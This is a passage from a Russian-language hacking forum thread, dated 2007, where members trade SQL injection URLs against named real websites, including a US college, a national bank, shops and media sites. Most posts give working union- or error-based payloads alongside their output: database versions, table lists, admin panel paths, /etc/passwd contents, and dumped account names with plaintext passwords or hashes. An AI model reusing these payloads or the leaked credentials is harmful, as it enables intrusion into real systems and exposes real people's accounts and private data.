SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    http://www.lsg.ru/index.php?page=sexolog&art=-1'+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9/*

    4.1.22-standard/gilboev_44/gilboev_1@localhost

    -----------------------------------------------------------------

    http://www.beloretsk.ru/news/view.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10/*

    4.0.27-max-log/beloret/beloret@v4.valuehost.ru
     
    2 people like this.
  2. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    edu+MSSQL

    www.lasc.edu

    Code:
    _http://www.lasc.edu/main.asp?id=-1'+or+1=@@version--
    Version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    User:lasc

    DBName:lasc

    случайно наткнулся, кому интересно капайте дальше.
     
    3 people like this.
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    http://www.moldova.ru/index.php?tabName=articles&owner=19&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/*

    4.1.19-standard-log/moldova_moldova/moldova_design@sr.dualg.com

    -------------------------------------------------------------------

    infobank.mossport.ru

    http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=@@version

    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    DB: casper
    User:cabi



    http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=(select+top+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(passw+as+nvarchar)+from+tMKSInetUser+where+UserID=1)--

    логин/пароль
     
    1 person likes this.
  4. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.llrickard.com/show_details.php?id=1179933989+union+select+1,2,3,4,5,6,7,8,9/*
    не выводит таблицы
    --------------------------------------------------
    Code:
    http://www.ewms.ltd.uk/show_details.php?recordID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
    version:4.1.22-standard-log
    user:
    ukbf@server213-171-219-234.livedns.org.uk
    DB:
    readymade
    таблицы: news, users
    --------------------------------------------------
    Code:
    http://www.karakteruitgevers.nl/show_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
    Пипец таблиц много
     
    #3464 -MoLoToK-, 29 Oct 2007
    Last edited: 29 Oct 2007
    2 people like this.
  5. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    97
    Likes Received:
    41
    Reputations:
    6
    http://www.lasc.edu/admin/ - админка

    Таблицы:
    'IMPORTprofessors',
    'categories',
    'classes',
    'courses',
    'dtproperties',
    'extension_tbl',
    'files',
    'filetype_tbl',
    'history_tbl',
    'homework',
    'IMPORTclasses',
    'IMPORTcourses',
    'media_tbl',
    'OLDclasses','OLDcourses','OLDprofessors',
    'professors',
    'redirects',
    'semesters',
    'skyroot',
    'subjects',
    'sysconstraints',
    'syssegments',
    'user_rights',
    'user_rights_pages',
    'users',
    'wysiwyg_tbl',
    'comd_list',
    'D99_Tmp',
    'faculty_documents',
    'faculty_info',
    'faculty_links',
    'jiaozhu',
    'kill_kk',
    'My_Cmd_Tmp2876418714116'
    -----
    Выводил из users:
    Code:
    http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)--
    chilinma:btsariel*12
    larsonl:miriam*12
    gallagherm:maryg*12
    MageeCL:business*15
    medinamr:torres*12
    Code:
    http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users++where+username+not+in('chilinma','larsonl','gallagherm','MageeCL'))--
    ----
    Дальше капать лень... ^^


    Iceangel_
    А с чего ты взял, что она там вообще есть?
     
    2 people like this.
  6. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    607
    Likes Received:
    331
    Reputations:
    148
    Парапсихология - Пути к истине от RIN.RU

    http://istina.rin.ru/cgi-bin/print.pl?sait=2&id=-1'+UNION+SELECT+1,2,3/* все читается в заголовке страницы.

    user:postcards@192.168.1.234
    version:4.0.26
    base:ufo

    есть доступ в mysql.user но кроме имен ничего не дает
    chat, igor, sergey, qmail, по крайней мере я не смог.

    прочиталось:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nol

    /var/www/html/hosts/nataly/istina/ по моему можно получить шелл, не уверен, только учусь.

    в антибояне есть money.rin.ru, state.rin.ru
     
    #3466 Elvis000, 30 Oct 2007
    Last edited: 30 Oct 2007
    2 people like this.
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    izhbowling.ru

    http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10/*

    4.1.22-STANDARD/IZHBOWLI_DB/IZHBOWLI_US@LOCALHOST


    http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_icq),4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/*

    логин/хеш/уин
     
  8. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    141
    Likes Received:
    216
    Reputations:
    17
    http://www.individual.com/
    Какая-то крупная контора, что-то вроде своего блога...

    Version: 4.0.14-standard-log
    User: idc_v3@localhost


    mysql.user:
    root:7725046d7c65a8e3
    idc_v3:7725046d7c65a8e3
    s2sys:74b461150a6eacc4
    s2user:3761b1e6152af41e
    ftlc:4e2d333721893319
    Есть табла account в ней нащупал только одну колонку - passwd, но не могу найти колонку с логинами...
    Количество юзверей впечатляет +/- 25 000
     
    #3468 0nep@t0p, 30 Oct 2007
    Last edited: 30 Oct 2007
    3 people like this.
  9. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    219
    Likes Received:
    85
    Reputations:
    16
    Национальный банк Таджикистана...
    http://www.nbt.tj/en/?c=44&id=44&a=1+union+select+1,version(),user(),4,5/*
     
    2 people like this.
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    arhd.ru
    Code:
    http://arhd.ru/element.html?rid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    4.0.23-log:arhd:arhd@213.219.217.68
     
  11. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    607
    Likes Received:
    331
    Reputations:
    148
    Fashion Time фото


    Code:
    http://www.ft-foto.ru/stat.php?action=article_view&id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
    user: ft_foto_ru@localhost
    version: 5.0.24a-log
    database: ft_foto_ru
     
    2 people like this.
  12. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,3,4,5,6,7,8,9/*
    база

    HTML:
    http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,password,4,username,6,7,8,9+FROM+users/*
    вход в админку

    HTML:
    http://www.triantaphyllides.org/admin/login.php?accessdenied=%2Fadmin%2Findex.php
     
    1 person likes this.
  13. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.corkaghpark.com/newscontent.php?id=-90%20UNION%20SELECT%201,2,3,passwd,username+FROM+users/*
    пасс зашифрован, только он супер лёгкий...админка зато офигенная )
     
    #3473 KEHT33, 30 Oct 2007
    Last edited: 30 Oct 2007
    1 person likes this.
  14. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.aic.ie/site/newscontent.php?id=-8%20UNION%20SELECT%201,2,passwd,4,5+FROM+admin/*
    всё думаю пнятно
     
    1 person likes this.
  15. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    432
    Reputations:
    287
    bookshop.ua
    Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    db_name: Shop2
    system_user: webuser
    Вот первые 100 таблиц:
    Code:
    http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TypePaher','News','Visits_page','all_kn_z_1','Post','__BAKU','__Export','__OzonPicturesBig','__OzonPicturesSmall','__vw_baku','_Temp_New_Price_FileName','_vw_All_Book','_vw_BigMir_XML_currency','_vw_BigMir_XML_Item','_vw_BigMir_XML_Price','_vw_BookLit_Price','_vw_Coef_For_Report_TOP1000','_vw_CustomerGross','_vw_DeliveryToPayment','_vw_Discount_Book','_vw_New_Publishing','_vw_New_SeriesThema','_vw_OBV_Catalog','_vw_OBV_Export_1','_vw_Price','_vw_Report_TOP50_Author','_vw_Report_TOP50_Publishig','_vw_site_Menu','_vw_Subscribe_News','_vw_View_Zayavka','1c','Account_Jur','Account_Private','Action','all_kn_z','BHV','Bonus','Book_for_portal','BooksPrice','BooksZakaz','bs_ozon','BSM_BooksPrice','CatalogBooks','CatalogNum','CatalogThema','Club','Coef','cost_delivery','CounDaliv','Country','Currency','CurrencyUse','Dalivery','Date_Export','Doc','Dolg_Books','Dolg_Books_K','Dolg_Books2','Dostavka','dtproperties','Enterprise','Entr_D','Exchange','FD','ForgetOrder','GuestBook','Instore','komplekt_z','komplekt_zakaz','Konkurs','MaxRealReestrK_ID','MaxRealReestrP_ID','Message','MessageInProcedure','MiniPortal','NameNews','Not_Form_Ozon','NotMoney_NP','Obzor','Opl_N_Otpr','Other_Z_Kn','Pather','Payment','Picture_URL','Portal','Portal_Books','Postperevod','PP_ACTION','PP_ADM','PP_NAMES','PP_PAYMENTS','PP_TYPE','Publishing','QuestAnk','Question','QuestionAnswer','Quickly','ReestrK','ReestrP','Regions','Release','SendNews','Series','Shipment','Statement','subscriber','subscription','sysconstraints','syssegments','Talk','tbl_BookAdvice','tbl_Catalog','tbl_Catalog_To_Best','tbl_Catalog_TOP5_Best','tbl_CatalogToGoods','tbl_CatologTree','tbl_CorparateOrder','tbl_DistrictUa'))--
    
    Code:
    http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+cast(admPwd+as+nvarchar)%2B%27%3A%27%2Bcast(SMTPpwd+as+%20nvarchar)+%2B%27%3A%27%2Bcast(SMTPuser+as+%20nvarchar)+from+PP_ADM)--
    
    xx:xx:GeneralManager
    Админку не нашел
     
    1 person likes this.
  16. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    188
    Likes Received:
    161
    Reputations:
    24
    deznetr_infectio@localhost
    5.0.45-log
    deznetr_dez
     
    4 people like this.
  17. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    www.rusins.ru - Русский Страховой Центр
    Code:
    http://www.rusins.ru/ru/index.php?newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9/*
    4.0.20-log:rusins:rusins@localhost

    www.csr.ru - Центр Стратегических Разработок
    Code:
    http://www.csr.ru/theme/theme.php?idt=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    4.0.14-standard-log:csr:root@localhost
    Code:
    http://www.csr.ru/theme/theme.php?idt=-1+union+select+load_file(0x2f6574632f706173737764)+from+mysql.user/*
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin
     
    1 person likes this.
  18. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    141
    Likes Received:
    216
    Reputations:
    17
    http://www.coogans-run.co.uk/
    Code:
    http://www.coogans-run.co.uk/h/steve-coogan-newsitem.php?id=-50+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+users/*
    Админку или любое другое поле для авторизации найти не смог...
    Version: 4.1.20
    User: hullabal00@193.111.201.160


    http://www.odeonfilm.de/
    Code:
    http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63,64+from+users/*
    В таблице users нашел только колонку с именами - login, а вот с пассами не смог...
    Version: 4.0.24_Debian-10sarge2-log
    User: odeonfilm@localhost


    http://www.kino.com/
    Code:
    http://www.kino.com/theatrical/th_item.php?film_id=-778+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
    Version: 4.0.12-standard
    User: kino@lma671.siteprotect.com


    http://www.zebrafilm.pl/
    Code:
    http://www.zebrafilm.pl/index.php?page=filmy&lang=eng&sub=fabula&sub2=details&filmID=-77+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,version(),28,29,30/*
    Version: 5.0.45-log
    User: zebrafilm@aoc175.rev.netart.pl
     
    4 people like this.
  19. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    chelmarket.ru
    Code:
    http://www.chelmarket.ru/show_goods_simple.php?cod=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/*
    4.1.15-log:chelmarket:3wchelmarket@deimos.surnet.ru

    kratos.ru - Кратос-компьютерс
    Code:
    http://www.kratos.ru/price.php?dir=3&sub=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*
    4.1.22-standard-log:kratos_chel:kratos_chel@localhost

    trubaopt.ru
    Code:
    http://www.trubaopt.ru/?page=board&pos=0&vol=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14/*&pg=126
    4.0.26-log:udb2183:Uwww2183S@localhost

    Таблицы не поддаются :mad:
     
    1 person likes this.
  20. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    196
    Likes Received:
    288
    Reputations:
    20
    Сайт в зоне .de, логично предположить, что колонка password может быть на немецком, т.е. passwort =) также там есть колонка email
     
    5 people like this.
Loading...
Thread Status:
Not open for further replies.